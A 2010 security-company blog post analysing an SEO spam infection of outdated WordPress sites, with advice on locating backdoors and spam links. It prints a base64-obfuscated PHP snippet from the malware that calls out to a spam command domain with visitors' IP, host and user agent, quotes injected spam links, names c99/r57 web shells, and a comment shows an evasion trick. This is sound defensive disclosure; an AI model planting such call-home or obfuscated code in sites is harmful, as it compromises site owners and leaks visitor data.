• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

SEO SPAM network – Code used and more details

May 27, 2010David Dede

FacebookTwitterSubscribe

Lately we have been talking a lot about WordPress sites getting hacked with SEO Spam:

1-SEO SPAM network – Details of the wp-includes infection
2-It is not over – SEO Spam on sites infected

Some big sites got infected and the common complain I hear is that even after they clean up the SPAM, it just “magically” reappears after a few days.

Infection and analysis

*This is important: The latest version of WordPress (2.9.2) is not vulnerable, but if you took a while to upgrade, your site might have been hacked in the past and they left a backdoor hanging in there. So you need to find where it is.

We are seeing three attack behaviors:

1-SPAM is added to all the pages. This is generally done by infecting the wp-blog-header.php or the footer.php inside the templates.
2-SPAM is not visible in the main pages and only added inside the wp-includes.
3-Backdoors are left by the attackers (very common).

When SPAM is added to all the pages, it is easy to spot. If you do a “view” source on your site, you will see lots of links at the bottom:

<a href="http://www.bbc.th.edu/phpBB/language/lang_thai/email/request.php?p=rezeptfreie-potenzmittel<br  />medikamente rezeptfrei medikamente rezeptfrei
<a href="http://www.bbc.th.edu/phpBB/language/lang_thai/email/request.php?p=super-kamagra-billig-kaufen;
super kamagra billig kaufen
<a href=">
super kamagra billig kaufen
<a href="http://www.bbc.th.edu/phpBB/language/lang_thai/email/request.php?p=viagra-kaufen-in-hamburg
kaufen viagra<br  />..<br  /><a href=">
kaufen viagra ..

Our scanner also detects it pretty easily.

When the SPAM is not visible, the easiest way to find them is by doing Google searches using your domain name + SPAM keywords. We explain it in detail here.

Finding the backdoors is a bit more tricky. On most of the cases, we are seeing them hidden inside these places:

-wp-content/uploads – Search for .php files
-wp-includes/index.php or inside wp-includes/js – Search for .php files

However, they can be anywhere. My recommendation is that you download all your files to your desktop and do a mass search for “eval(base64_decode” or large strings inside PHP files. Using an AV will also help to find everything.

Code being used

The code being used to serve the SPAM is this one: http://sucuri.net/malware/entry/MW:SPAM:PH23 or sometimes this one (in the case of the .files directory).

We are seeing a lots of sites reading the “orders” from this domain: http://dvc44ftgr.com. It is hidden inside the code using base64 encoding:

$RAF63EAA7A2D15CA59ABB95B6FD1AFEBF=
"http://".base64_decode("ZHZjNDRmdGdyLmNvbQ==")."/links
/".rand(0,250).".txt?ip=".$_SERVER["REMOTE_ADDR"]."&
host=".rawurlencode($_SERVER["HTTP_HOST"])."&
agent=".rawurlencode($_SERVER["HTTP_USER_AGENT"]);

Plus, this domain is full of spammy sub-domains: citect-software.dvc44ftgr.com, jobs-mississauga.dvc44ftgr.com, trigonometry-calculate.dvc44ftgr.com, download-pinball.dvc44ftgr.com, etc, etc.

For the backdoors, they are using simple variations of the c99 (or the r57) PHP shells. You can see some of them in our blacklist database: f57, c99, etc.

If anyone have more information, let us know.

If your site is hacked (or with malware) and you need help, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

FacebookTwitterSubscribe

Categories: UncategorizedTags: Hacked Websites, SEO Spam

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. Bourgy

    May 30, 2010

    These guys are becoming more and more sophisticated it seems

  2. guaka

    June 14, 2010

    I've seen some code like $y = 'base'.'6';$y.= '4_d'.'ecode'; – making it way harder to detect.

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.